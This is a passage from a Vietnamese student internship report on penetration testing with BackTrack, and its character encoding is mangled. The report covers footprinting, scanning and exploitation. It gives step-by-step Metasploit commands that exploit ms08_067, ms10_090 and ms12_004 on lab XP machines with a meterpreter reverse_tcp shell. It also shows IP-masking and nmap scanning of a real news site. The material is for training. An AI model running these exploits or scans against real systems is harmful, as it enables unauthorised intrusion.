viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
